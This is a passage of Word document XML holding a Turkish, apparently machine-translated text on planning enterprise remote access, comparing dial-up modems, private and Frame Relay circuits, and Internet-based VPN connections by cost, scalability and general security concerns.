          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>İşyeri Ortamının Şeffaf Çoğaltılması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51"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Telekomünikasyon cihazları ve yol savaşçıları için uzaktan erişim, fiziksel olarak kendi konumlarında olsaydı, keyif alacakları aynı düzeyde bağlantı ve işlevsellik sağlamalıdır. Merkez şubesi, şirket merkezi ağlarına merkez kampüs ile aynı erişime sahip olmalıdır. Dahili ağ işteki çalışanlar tarafından serbestçe erişilebilirse, uzak çalışanlar aynı derecede erişimi bekler. Dahili ağ fiziksel veya mantıksal güvenlik kısıtlamalarına tabi ise, uzaktan erişim sistemi bu kısıtlamaların uygulanmasını sağlamalıdır. Uzak sistemlerde tam işlevsellik bulunmuyorsa, iş açısından kritik öneme sahip kaynak ve uygulamalara öncelik verilmelidir, aksi takdirde insanlar bunu kullanmaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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Şeffaf bağlantı sağlamak, göründüğünden daha zor olabilir. Küçük bir organizasyonda bile, kişisel çalışma alışkanlıkları çalışanlardan çalışanlara büyük farklılıklar gösterir ve bu farklılıkların uzaktan erişim kullanımını nasıl etkileyebileceğini tahmin etmek problemlidir. Örneğin, bir UNIX dosya sunucusunda depolanan verilere erişimi düşünün. UNIX iş istasyonlarına sahip çalışanlar, bu dosyalara erişmek için Ağ Dosya Hizmeti (NFS) protokolünü kullanır. NFS, düzgün çalışması için kendi özel ağ bağlantıları, sunucu yapılandırmaları ve güvenlik ayarlarını gerektirir. Windows tabanlı iş istasyonlarına sahip çalışanlar, aynı dosyalara erişmek için muhtemelen Sunucu Mesaj Veriyolu (SMB) protokolünü kullanır. SMB kendi konfigürasyon dosyalarını ve güvenlik ayarlarını gerektirir. Kurumsal uzaktan erişim sistemi NFS'yi aktaramadığında.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Uzak Kullanıcılara ve Konumlara Bağlantı</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B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sağlam ve uygun maliyetli bir uzaktan erişim sistemi, telefon hatları, kalıcı özel ağ bağlantıları, isteğe bağlı arama ağ bağlantıları ve İnternet dahil olmak üzere çeşitli mekanizmalar üzerindeki bağlantıları destekler. Bu, uzaktan erişim mimarisinin, tüm bağlantı mekanizmalarının herhangi bir zamanda kullanılmakta olup olmadığına bakılmaksızın, ağ altyapısı geliştikçe kullanışlılığını korumasını sağla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Birden fazla bağlantı tarzı desteği, kurumsal ağa çeşitli konumlardan erişim için bir çerçeve oluşturur: oteller, evler, şirketler şubesi, iş ortakları ve müşteri siteleri, yerel veya uluslararası. Bu esneklik ayrıca sisteme artıklık ve performans ayarlama yetenekleri ekleme görevini de basitleştiri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 xml:space="preserve">Halihazırda konuşlandırılmış uzaktan erişim sistemlerinin çoğu, en azından çalışan ve istemciden sunucuya uzaktan bağlantı için, ağ protokolü olarak TCP / IP kullanmaktadır. Daha küçük bir kesim IPX, NetBIOS / NetBEUI ve diğer LAN protokolleri için destek gerektirmeye devam ediyor; SNA, DECNet ve daha eski servisleri bile daha az destekliyoruz. TCP / IP çoğu modern bilgisayar işletim sisteminde destek avantajı sunar; Çoğu kurumsal uygulama TCP / IP'yi ağ protokolü olarak kullanır veya trafiğinin TCP / IP ağları üzerinden kapsüllenmesine izin </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>verir. Bu bölüm, TCP / IP tabanlı uzaktan erişim ve özel güvenlik kaygıları üzerine odaklanmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Maliyetleri En Aza İndir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51"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İyi bir uzaktan erişim çözümü, donanım, ağ kullanımı ve destek personelinin maliyetlerini en aza indirecektir. Elbette, uzaktan erişim, uygun yatırım getirisi ve uygun personel bütçeleri için uygun harcamaların belirlenmesinin kuruluştan organizasyona farklılık gösterdiğini ve kaynak kaybına duyarlılık, ağ ve güvenlik tasarımında kurumsal uzmanlık ve Sanayiye bağlı olarak olası düzenleme sorunları.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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Herhangi bir uzaktan erişim uygulamasında, toplam maliyete en yüksek tek katkı kalıcı devrelere yapılan ödemeler, telefon kapasitesi, özel ağ bağlantıları veya İnternet erişimi olabilir. İş gereklilikleri, tipik olarak uzak kullanıcıların beklenen yerlerine, gereken LAN-LAN bağlantılarının sayısına ve verimlilik ile eşzamanlı bağlantılara ilişkin beklentilere bağlı olarak, gerekli devre tipleri kombinasyonunu belirleyecektir. Ekipman, yazılım ve kurulum için bir defalık ücretler, özellikle yüksek güvenlikli bir ortamda, uzaktan erişim mimarileri arasındaki nadiren temel farklılıklardır. Bununla birlikte, uzaktan erişim seçenekleri arasında adil bir şekilde karar vermek ve gelecekteki büyümeyi planlamak için, maliyet tahminlerinde aşağıdaki bileşenleri göz önünde bulundurun:</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 xml:space="preserve">• Bir kerelik donanım ve yazılım maliyetler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Kurulum ücretler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Bakım ve yükseltme maliyetler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xml:space="preserve">• Ağ ve telefon devreleri </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color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>• Kurulum ve günlük yönetim için gereken personel</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Uzaktan erişim mimarilerinin tümü bir kuruluşun işletme gereksinimlerini minimum para ve çabayla karşılamayacak, bu nedenle ilk aşamalarda planlama yapmak çok önemlidir.</w:t>
      </w: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Bu yazının yazıldığı sırada, bireyler için İnternet erişimi, özellikle uzun mesafeli telefon ücretlerinin maliyeti ile karşılaştırıldığında nispeten ucuzdur. Evde İnternet erişim maliyeti, kullanım başına hesaplamalar yerine aylık ücrete dayalı olduğu sürece, özellikle seyahat eden çalışanlar için bireysel uzaktan erişim sağlamak için İnternet kullanımı ekonomik olarak cazip kalacaktır. Bir kurumun genel İnternet stratejisine bağlı olarak, şube ve merkez arasındaki özel ağ bağlantılarının güvenli İnternet bağlantılarıyla değiştirilmesi, birkaç yıl boyunca üçte bir ila üç buçuk arasında tasarruf sağlayabilir. Uzaktan erişim için bu devasa maliyet düşüşü, güvenli sanal özel ağların kurumsal bir uzaktan erişim altyapısı olarak değerlendirilmesinde birincil motivasyondur. Ancak, bir kuruluşun İnternet ağları ve güvenlik sistemlerinin konuşlandırılmasında deneyimli teknik kadroya sahip olmaması durumunda, devam eden devre maliyetleri açısından algılanan tasarrufların idari personeli işe alma ve eğitme girişiminde kolayca kaybedilebileceğini unutmayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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Bu gereksinimler ışığında uzaktan erişim altyapılarını değerlendirmek güvenlik mimarının sorumluluğundadır. Uzaktan erişim ekipmanı ve servis sağlayıcıları ekipmanlarının performansı, beklenen idari ve bakım gereklilikleri ve fiyatlandırma hakkında bilgi sağlayacaktır. Telefon ve ağ bağlantısındaki fiyatlandırmayı düzenli olarak inceleyin; telekomünikasyon pazarı hızla değişiyor ve erişim maliyetleri coğrafya, ses / veri iletişimi hacmi ve şirket birleşmeleri olasılığı gibi çeşitli fakt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>örlere karşı son derece hassas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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İyi bir uzaktan erişim sistemi ölçeklenebilir, uygun maliyetli ve desteklemesi kolaydır. Ölçeklenebilirlik sorunları arasında donanım ve yazılım geliştirmeleri yoluyla uzaktan erişim sunucularında (özel ağa açılan kapılar) kapasite artışı; özel ağa ağ bant genişliğinin (veri veya telefon hatları) arttırılması; ve altyapıyı ve uzak kullanıcıları destekleyecek personeli sağlamak. Eğer sistem görev açısından kritik bir bağlantı sağlamak için kullanılacaksa, dağıtımın ilk aşamalarından itibaren güvenilir, ölçülebilir verimlilik ve artıklık ile tasarlanması gerekir. Kritik bağlantıların ortaya çıkacağı her yerden uzaktan erişimin yedekleme yöntemleri gerekecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Her uzaktan erişim sisteminin mutlaka bu özelliklerin her birine sahip olmadığını (veya gerektirdiğini) unutmayın. Herhangi bir şirket ortamında, güvenlik kararları önceden var olan politikalara, algılanan tehdide, potansiyel kayıplara ve yasal gerekliliklere dayanmaktadır - ve diğerleri gibi uzaktan erişim kararları, belirli bir kuruluş ve ağ gereksinimlerine özel olacaktır. Nispeten sabit bir çalışan popülasyonuna sahip 30 ila 40 seyahat satış ekibini destekleyen bir kuruluşun, esneklik ve ölçeklenebilirlik için minimum gereksinimleri vardır - özellikle de uzak kullanıcıların tümü güvenilir çalışanlar olduğu ve yalnızca bir güvenlik politikası uygulandığı için. Birden fazla lokasyona sahip büyük bir organizasyon, beş veya altı iş ortağı ve büyük bir danışman popülasyonu muhtemelen farklı seviyelerde uzaktan erişim gerektirir. Çalışanların işten ayrılması ve değişen iş koşulları, uzaktan erişim sunucularından yönetilebilirliğin artmasını da gerektirmektedir; bu, muhtemelen birden fazla güvenlik ilkesini ve erişim kontrolü gereksinimlerini aynı anda yürütmesi gerekecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Uzaktan Erişim Mekanizmaları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Uzaktan erişim mimarileri üç genel kategoriye ayrılır: (1) analog modemler ve genel telefon ağı aracılığıyla uzaktan kullanıcı erişimi; (2) ısrarlı veya talep üzerine özel ağ bağlantıları üzerinden erişim; ve (3) İnternet gibi ortak ağ altyapıları yoluyla erişim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Telefonlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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Telefonlar ve analog modemler son yirmi yıldır bilgisayar kaynaklarına uzaktan erişim sağlıyor. Genellikle evde veya otel odasında bulunan bir kullanıcı, bilgisayarını standart bir telefon prizine bağlar ve şirket konumundaki bir ağ erişim sunucusuna (NAS) bir noktadan noktaya bağlantı kurar. NAS, kullanıcı kimlik doğrulaması, erişim kontrolü ve muhasebe işlemlerinin gerçekleştirilmesinden ve telefon bağlantısı canlı iken bağlantıyı sürdürmekten sorumludur. Bu model düşük son kullanıcı maliyetinden yararlanır (telefon ücretleri, yerel aramalar için genellikle çok düşüktür ve genellikle işveren tarafından uzun mesafeli geçiş ücretleri için karşılanır) ve aşinalıktır. Modemler, en azından telefon hatlarına yaygın erişimi olan yerlerde, kullanımı genellikle kolaydır. Modem tabanlı bağlantı, iş yerlerinden uzaktan erişim gerektiğinde daha da sınırlıdır ve bu da kendi tesislerinden esasen sınırsız giden erişimine izin vermek istemeyebilir.</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Ancak dezavantajları bol. Tüm telefon sistemleri eşit olarak oluşturulmaz. Eski telefon şebekelerine sahip bölgelerde, elektrik paraziti veya sinyal kaybı, uzak bilgisayarın NAS ile güvenilir bir bağlantı kurmasını engelleyebilir. Bir bağlantı kurulduktan sonra bile, veri aktarım hızı düşükse, bazı ağ uygulamaları (özellikle multimedya paketleri ve ağ gecikmesine duyarlı uygulamalar gibi zamana duyarlı servisler) başarısız olabilir. Bu sorunları şirket karargahlarından çözmek ya da kontrol etmek neredeyse imkansız.</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Modem teknolojisi, ekipmanın sık ve potansiyel olarak pahalı bir şekilde bakımını gerektirerek hızla değişmektedir. Ağ erişim sunucuları, düşmanca eylem için popüler hedeflerdir çünkü özel ağa tek bir giriş noktası sağlarlar - çoğunlukla kötü korunan bir ağ geçidi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Özel Ağ Bağlantıları</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B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İş yeri bağlantısı - uzak kurumsal yerler için ağ bağlantıları - ve iş ortağı bağlantıları, özel özel ağ devreleri kullanılarak sık sık karşılanmaktadır. Özel ağ bağlantıları, başlıca telekomünikasyon sağlayıcılarının çoğu tarafından sunulmaktadır. Genellikle birden fazla lokasyona bağlanmanın en güvenli yolu olarak kabul edilirler, çünkü taşıdıkları tek ağ trafiği aynı organizasyona aittir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51"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Özel ağ bağlantıları iki kategoriye ayrılır: özel devreler ve Frame Relay devreleri. Özel devreler aboneleri için yalıtılmış bir fiziksel devre sağladıkları için en özel olanlardır (dolayısıyla adı).</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Özel bir bağlantıdaki tek veri abone kuruluşuna aittir. Saldırgan, yalnızca telekomünikasyon sağlayıcısının kendisine saldırarak özel bir devre altyapısını alt edebilir. Bu önemli bir koruma sunar. Ancak telekom ataklarının korsan sözlükte en eski olanı olduğunu unutmayın - ses hatlarına erişimi kolaylaştıran mekanizmaların çoğu veri devreleri üzerinde de çalışır, çünkü fiziksel altyapı aynıdır. Finansal kurumlar gibi yüksek güvenlikli ortamlar için, özel ağ bağlantılarında bile güçlü kimlik doğrulama ve şifreleme gerekir.</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Çerçeve Rölesi bağlantıları, trafiği karelere sığdırarak paylaşılan bir fiziksel altyapı üzerinden özel bant genişliği sağlar. Çerçeve başlığı, trafiği güvenli bir şekilde hedefine ulaştırmak için adresleme bilgilerini içerir. Ancak ortak fiziksel devre kullanımı, özel devrelere göre Çerçeve Rölesi bağlantılarının güvenliğini azaltır. Çerçeve devreleri arasındaki paket sızıntısı iyi bir şekilde belgelenmiştir ve Çerçeve Rölesi devrelerine gizlice giren cihazlar pahalıdır, ancak hazırdır. Bu riskleri azaltmak için birçok satıcı, paket yükünü şifreleyen, kaçaklara ve tıkanmalara karşı koruyan, ancak çerçeve başlıklarını yalnız bırakan, Çerçeve Rölesi özel donanım sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Özel ağ bağlantılarının güvenliği elbette bir ücretle karşılanıyor - özel bağlantılar için abonelik oranları genellikle İnternet bağlantılarından iki ila beş kat daha yüksek olsa da, yüksek hacimli kullanımlarda indirim önemli olabilir. Eğer telekomünikasyon sağlayıcıları bu alanlarda gerekli ekipmanı sağlayamazsa yalıtılmış alanlara yayılması zordur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İnternet Tabanlı Uzaktan Erişim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bir kurumsal ağa erişim sağlamanın en uygun maliyetli yolu, mümkün olduğunda ortak ağ altyapısından yararlanmaktır. İnternet her yerde, kullanımı kolay, ucuz bağlantı sağlar. Ancak, önemli ağ güvenilirliği ve güvenlik konularının ele alınması gerekir.</w:t>
      </w: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İnternet tabanlı uzaktan kullanıcı bağlantısı ve geniş alan ağları, hem doğrudan ücretlendirme hem de donanım bakım ve destek sistemleri, modern modem bankaları ve özel ağ devrelerinden çok daha ucuzdur. En önemlisi, ISS'ler modemleri ve çevirmeli yönlendirici yöneterek destek yükünü yönlendir ve kurumsal ağ / telekomünikasyon grubundaki yönlendirmeyi yükseltir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>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Tabii ki, İnternet üzerinden özel ağ iletişimini güvenceye almak çok önemli bir husustur. Çoğu TCP / IP protokolü, verileri açık metin olarak taşımak ve iletişimi gizlice dinleme saldırılarına karşı savunmasız kılmak üzere tasarlanmıştır. IP kimlik doğrulama mekanizmalarının eksikliği, oturum ele geçirmeyi ve izinsiz veri değiştirmeyi kolaylaştırır (veri aktarılırken). İnternetteki bir şirket varlığı, hizmet reddi saldırılarına özel bilgisayar kaynaklarını açarak sistemin kullanılabilirliğini azaltabilir. Yeni nesil İnternet protokollerinin, özellikle de IPSec'in devam eden gelişimi, bu sorunların çoğuna değinecek. IPSec, paket başına kimlik doğrulama, taşıma yükü doğrulama ve şifreleme mekanizmalarını geleneksel IP'ye ekler. Geniş çapta uygulanıncaya kadar, özel güvenlik sistemleri hassas trafiği bu saldırılara karşı açıkça korumalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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İnternet bağlantısı, özel ağ bağlantılarından çok daha az güvenilir olabilir. İnternet sorunlarını giderme, özellikle de bir kuruluş genel olarak geniş alanlı ağ bağlantılarını kurum içinde yönetmişse, sinir bozucu olabilir. İnternetteki herhangi bir merkezi otoritenin olmayışı, paket kaybı, beklenenden yüksek gecikme süresi ve omurga İnternet sağlayıcıları arasında paket değişimi kaybı gibi hizmet sorunlarının çözülmesi zaman alabilir. Bu kaygının farkına varmakla birlikte, ulusal İnternet servis sağlayıcılarının birçoğu, iş açısından kritik bağlantılar için servis seviyesi anlaşmaları ve geliştirilmiş izleme araçları (daha yüksek maliyetle) sağlayan “business class” İnternet bağlantısı sunmaya başlıyor.</w:t>
      </w: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İş gereksinimlerine bağlı olarak, minimum düzeyde bağlantı ve verim düzeyi sağlayacak mekanizmalar göz önüne alındığında, VPN teknolojisi, İnternet tabanlı uzaktan erişim güvenliğini artırmak için kullanılabilir. Bu tartışmanın amaçları doğrultusunda, VPN halka açık bir ağ üzerinden “güvenli bir şekilde iletişim kuran iki veya daha fazla özel sektöre ait ve yönetilen bilgisayar sisteminden oluşan bir gruptur.</w:t>
      </w:r>
    </w:p>
